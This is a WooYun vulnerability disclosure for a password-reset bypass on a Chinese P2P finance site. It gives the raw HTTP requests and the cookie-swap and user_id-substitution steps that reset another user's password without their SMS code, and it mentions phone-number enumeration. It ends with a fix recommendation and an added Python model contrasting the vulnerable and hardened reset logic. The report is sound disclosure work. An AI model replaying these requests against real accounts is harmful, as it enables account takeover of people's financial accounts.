
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0136060

Title: P2P finance security: arbitrary user password reset on a 好贷网 site

Vendor: 好贷网

Author: 二维码

Submitted: 2015-08-22 13:45

Fixed: 2015-10-08 16:06

Published: 2015-10-08 16:06

Vulnerability type: Unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-22: Details sent to the vendor, awaiting vendor handling
2015-08-24: Vendor confirmed; details visible only to the vendor
2015-09-03: Details disclosed to core white hats and domain experts
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public

Brief description:

There is no access control that cannot be bypassed, only white hats who do not try hard enough.

Detailed description:

The problem is in the forgot-password flow of 好贷云金融 (Haodai cloud finance).
First register a user, then click "Forgot password".
Step 1: enter the registered user's phone number

POST /forget/index HTTP/1.1
Host: yun.haodai.com
Proxy-Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://yun.haodai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.52 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://yun.haodai.com/forget/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _jzqy=1.1437404006.1437404006.1.jzqsr=baidu.-; __utma=6180778.38555312.1437494982.1437494982.1437494982.1; __utmz=6180778.1437494982.1.1.utmcsr=open.haodai.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _jzqx=1.1437494988.1437494988.1.jzqsr=haodai%2Ecom|jzqct=/wenzhang/about/cate_id/1.-; PHPSESSID=uj2clr26429v2042cjfqchs3i0; SOURCE_HOST=yun.haodai.com; SOURCE_URL=http%3A%2F%2Fyun.haodai.com%2F; city=suzhou; _adwp=259660040.8949730735.1437404004.1437494982.1440217985.4; _adwb=259660040; _adwc=259660040; _adwr=259660040%230; Hm_lvt_64011e29de8b8794bd7490bbe3d1c0f5=1437808207,1440217986; Hm_lpvt_64011e29de8b8794bd7490bbe3d1c0f5=1440217986; _jzqa=1.834904286475560400.1437404006.1437494988.1440217987.4; _jzqc=1; _jzqckmp=1; _jzqb=1.1.10.1440217987.1; ipcity=suzhou; Hm_lvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440217293; Hm_lpvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440219352
step=1&email=15657XXXX34&verify=4876


After receiving the verification code on my own phone, enter the SMS code (step 2):

POST /forget/getpasswd HTTP/1.1
Host: yun.haodai.com
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://yun.haodai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.52 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://yun.haodai.com/forget/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _jzqy=1.1437404006.1437404006.1.jzqsr=baidu.-; __utma=6180778.38555312.1437494982.1437494982.1437494982.1; __utmz=6180778.1437494982.1.1.utmcsr=open.haodai.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _jzqx=1.1437494988.1437494988.1.jzqsr=haodai%2Ecom|jzqct=/wenzhang/about/cate_id/1.-; PHPSESSID=uj2clr26429v2042cjfqchs3i0; SOURCE_HOST=yun.haodai.com; SOURCE_URL=http%3A%2F%2Fyun.haodai.com%2F; city=suzhou; _adwp=259660040.8949730735.1437404004.1437494982.1440217985.4; _adwb=259660040; _adwc=259660040; _adwr=259660040%230; Hm_lvt_64011e29de8b8794bd7490bbe3d1c0f5=1437808207,1440217986; Hm_lpvt_64011e29de8b8794bd7490bbe3d1c0f5=1440217986; _jzqa=1.834904286475560400.1437404006.1437494988.1440217987.4; _jzqc=1; _jzqckmp=1; _jzqb=1.1.10.1440217987.1; ipcity=suzhou; Hm_lvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440217293; Hm_lpvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440219416
user_id=9902&mode=tel&checksms=650693


Seeing a user_id here, I immediately suspected a vulnerability.
Step 3: after the SMS code passes validation, enter the new password twice

POST /forget/resetpasswd HTTP/1.1
Host: yun.haodai.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://yun.haodai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.52 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://yun.haodai.com/forget/getpasswd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _jzqy=1.1437404006.1437404006.1.jzqsr=baidu.-; __utma=6180778.38555312.1437494982.1437494982.1437494982.1; __utmz=6180778.1437494982.1.1.utmcsr=open.haodai.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _jzqx=1.1437494988.1437494988.1.jzqsr=haodai%2Ecom|jzqct=/wenzhang/about/cate_id/1.-; city=suzhou; _adwp=259660040.8949730735.1437404004.1437494982.1440217985.4; _adwb=259660040; _adwc=259660040; _adwr=259660040%230; Hm_lvt_64011e29de8b8794bd7490bbe3d1c0f5=1437808207,1440217986; Hm_lpvt_64011e29de8b8794bd7490bbe3d1c0f5=1440217986; _jzqa=1.834904286475560400.1437404006.1437494988.1440217987.4; _jzqc=1; _jzqckmp=1; _jzqb=1.1.10.1440217987.1; ipcity=suzhou; PHPSESSID=s0to0lfkrai5g4g0ie4djiu3j1; SOURCE_HOST=yun.haodai.com; SOURCE_URL=http%3A%2F%2Fyun.haodai.com%2Fforget%2Findex; Hm_lvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440217293; Hm_lpvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440219760
user_id=9902&passwd=test123&confirm_passwd=test123


Although there are only these three simple parameters, when I changed user_id directly to someone else's, the response said the user does not exist. Frustrating...
After I changed the cookie, I found that even user_id 9902 was reported as not existing.
So a cookie check is being done.
But is it really impossible to bypass?
I opened another browser, went to password recovery, entered someone else's phone number and the image captcha, and clicked "Next". Although I cannot get their SMS verification code, I can find their user_id (say 9XXX) in the returned page:

<input type="hidden" name="user_id" value="9XXX" />


Then, without entering the SMS code, I copied that browser's cookie, pasted it into step 3 of the password recovery flow above, and changed user_id to the user_id of the account I was attacking:

POST /forget/resetpasswd HTTP/1.1
Host: yun.haodai.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://yun.haodai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.52 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://yun.haodai.com/forget/getpasswd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=eernhfa2vtnvos47vvbpgknid6; SOURCE_HOST=yun.haodai.com; SOURCE_URL=http%3A%2F%2Fyun.haodai.com%2F; Hm_lvt_e8b7ad3a07009b2a72fb5c83ca882bb2=1440217293,1440219865; Hm_lpvt_e8b7ad3a07009b2a72fb5c83ca882bb2=144021997
user_id=9XXX&passwd=test123&confirm_passwd=test123


Submitted, and the page reports that the reset succeeded.
One more thing: at the first endpoint, registered phone numbers can be enumerated by brute force (the image captcha does not appear to be validated).

Proof of vulnerability:

[screenshot: 1.png]

[screenshot: 2.png]

Fix recommendation:

The cookie/session check should be stricter: step 3 must only reset the account whose SMS code was actually verified in that session, not whichever user_id the client posts.
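As an added example (not code from the original report or from the vendor), the Python below models the three-step flow server-side and contrasts the reported step-3 behaviour, which only checks that the session is inside a reset flow and then trusts the posted user_id, with a hardened version that binds the SMS-verified account to the session and consumes it. Account ids, phone numbers and the SMS code are constructed placeholders.

```python
import secrets

# Constructed sample accounts; ids and phone numbers are placeholders, not real data.
USERS = {
    9902: {"phone": "15657XXXX34", "password": "old-pw"},  # the reporter's own account
    9999: {"phone": "13800000000", "password": "old-pw"},  # stands in for the "9XXX" victim
}
SESSIONS = {}  # server-side session store keyed by session id (what PHPSESSID points at)

def step1_request_code(sid, phone):
    # Step 1: look up the phone, flag the session as mid-reset and send an SMS code;
    # returns the user_id that the page then embeds in the hidden <input> field.
    uid = next((u for u, rec in USERS.items() if rec["phone"] == phone), None)
    if uid is None:
        return None
    code = "650693"  # constructed; a real server draws a random code and sends it by SMS
    SESSIONS.setdefault(sid, {}).update(reset_pending=True, sms_user=uid, sms_code=code)
    return uid

def step2_check_sms(sid, user_id, code):
    # Step 2: verify the SMS code and bind the verified account to this session.
    s = SESSIONS.get(sid, {})
    if s.get("sms_user") != user_id or not secrets.compare_digest(s.get("sms_code", ""), code):
        return False
    s["verified_user"] = user_id
    return True

def step3_reset_vulnerable(sid, user_id, passwd, confirm):
    # Reported behaviour: only checks that the session is inside a reset flow,
    # then trusts the client-supplied user_id to choose which account to overwrite.
    s = SESSIONS.get(sid, {})
    if not s.get("reset_pending") or passwd != confirm or user_id not in USERS:
        return False
    USERS[user_id]["password"] = passwd
    return True

def step3_reset_hardened(sid, user_id, passwd, confirm):
    # Fix: the target is the account bound at step 2; the posted user_id is only
    # cross-checked, never used to select the account, and the session is consumed.
    s = SESSIONS.get(sid, {})
    target = s.get("verified_user")
    if target is None or target != user_id or passwd != confirm:
        return False
    USERS[target]["password"] = passwd
    SESSIONS[sid] = {}  # one-shot: a finished reset session cannot be replayed
    return True

def reset_without_sms_code(step3, phone="13800000000"):
    # Regression check for the report: a fresh session starts a reset for a phone,
    # never supplies the SMS code, and posts step 3 with that account's user_id.
    sid = secrets.token_hex(8)
    uid = step1_request_code(sid, phone)
    return step3(sid, uid, "test123", "test123")
```

The regression check returns True against the vulnerable endpoint and False against the hardened one, which is the property a fix for this report should be tested against.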

Copyright notice: please credit the source when reproducing: 二维码@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-08-24 16:05

Vendor reply:

Thanks

Latest status:

None yet


Vulnerability assessment:

Comments

  1. 2015-08-22 14:20 | S4M ( Passer-by | Rank:24 Vulnerabilities:8 | 吴彦祖)

    Awesome, awesome, bowing to the great hacker!

  2. 2015-09-13 16:09 | BMa ( Regular white hat | Rank:1796 Vulnerabilities:201 )

    @二维码 If I have understood correctly, the flaw here is that it checks whether the session matches the user id, but does not check whether that session is allowed to update the password.

  3. 2015-09-14 09:31 | 二维码 ( Intern white hat | Rank:61 Vulnerabilities:4 | 老子跳起来就是个么么哒)

    @BMa Their cookie presumably contains some field that identifies this user as needing a password update, so once I swapped in the cookie it succeeded.